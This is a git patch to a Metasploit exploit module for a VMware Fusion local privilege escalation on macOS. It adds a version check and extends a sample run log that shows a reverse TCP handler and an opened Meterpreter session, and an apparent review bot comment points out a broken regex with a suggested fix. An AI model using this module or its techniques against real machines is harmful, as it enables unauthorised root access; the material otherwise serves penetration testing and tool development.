From 7bc30ecf397c3cbb922e277dbd4e84fafe2d3cc7 Mon Sep 17 00:00:00 2001
From: h00die
Date: Tue, 24 Mar 2020 14:27:31 -0400
Subject: [PATCH] add version check

---
 .../exploit/osx/local/vmware_fusion_lpe.md | 2 ++
 .../exploits/osx/local/vmware_fusion_lpe.rb | 19 +++++++++++++++----
 2 files changed, 17 insertions(+), 4 deletions(-)

diff --git a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
index 3d41417e51..d5fb296a62 100644
--- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
+++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md
@@ -46,6 +46,8 @@ lhost => 1.1.1.1
 resource (fusion.rb)> set lport 8888
 lport => 8888
 resource (fusion.rb)> exploit
+[+] Vmware Fusion 11.5.1 is exploitable
+[*] The target appears to be vulnerable.
 [*] Started reverse TCP handler on 1.1.1.1:8888
 [*] Sending stage (53755 bytes) to 2.2.2.2
 [*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49265) at 2020-03-23 18:07:57 -0400
diff --git a/modules/exploits/osx/local/vmware_fusion_lpe.rb b/modules/exploits/osx/local/vmware_fusion_lpe.rb
index af7f69fa21..77b554b1ad 100644
--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Local
 user home directory in a specific folder, and creating a hard link to
 the 'Open VMWare USB Arbitrator Service' binary, we're able to launch it
 temporarily to start our payload with an effective UID of 0.
+ Successfully tested against 11.5.1, and 11.5.2
 ),
 'License' => MSF_LICENSE,
 'Author' =>
@@ -69,11 +70,21 @@ class MetasploitModule < Msf::Exploit::Local
 end
 def check
- if exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
- print_good "'#{usb_service}' binary detected"
- return CheckCode::Appears
+ unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
+ print_bad "'#{usb_service}' binary missing"
+ return CheckCode::Safe
 end
- CheckCode::Safe
+
+ version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
+ /=> "(?\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
+ version = Gem::Version.new(version)
+ if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
+ vprint_good "Vmware Fusion #{version} is exploitable"
+ else
+ print_bad "VMware Fusion #{version} is NOT exploitable"
+ return CheckCode::Safe
+ end
+ CheckCode::Appears
 end
 def exploit
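Review bot: The version match on the `/=> "(?…)"/ =~ version_raw` line is never checked before `version = Gem::Version.new(version)`, so when `plutil`/`grep` print nothing (plist unreadable, key absent, or a non-matching layout) the capture is nil and `Gem::Version.new` either warns and treats it as "0" or raises ArgumentError depending on the RubyGems release, turning `check` into an error instead of a CheckCode; as rendered here the group also carries no name, so `version` would never be assigned at all — if the real source reads `(?<version>…)` that part is fine. The pattern `\d{0,2}\.\d{0,2}\.\d{0,2}` additionally accepts an empty component such as `..` (which `Gem::Version` rejects) and misses a two-part string like `11.5`; `\d+(?:\.\d+)*` is the safer shape, with an explicit `return CheckCode::Unknown` when nothing matches. Minor style: the positive branch uses `vprint_good` while the negative uses `print_bad`, the product is spelled `Vmware` in one message and `VMware` in the other, and the trailing comment should read `# supposed 11.x is also vulnerable, but everyone who's tested shows 11.5.1 or 11.5.2`.
```ruby
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
match = version_raw.to_s.match(/=> "(?<version>\d+(?:\.\d+)*)"/)
unless match
  print_error 'Unable to determine the VMware Fusion version'
  return CheckCode::Unknown
end
version = Gem::Version.new(match[:version])
# … unchanged: between? range check and CheckCode result …
```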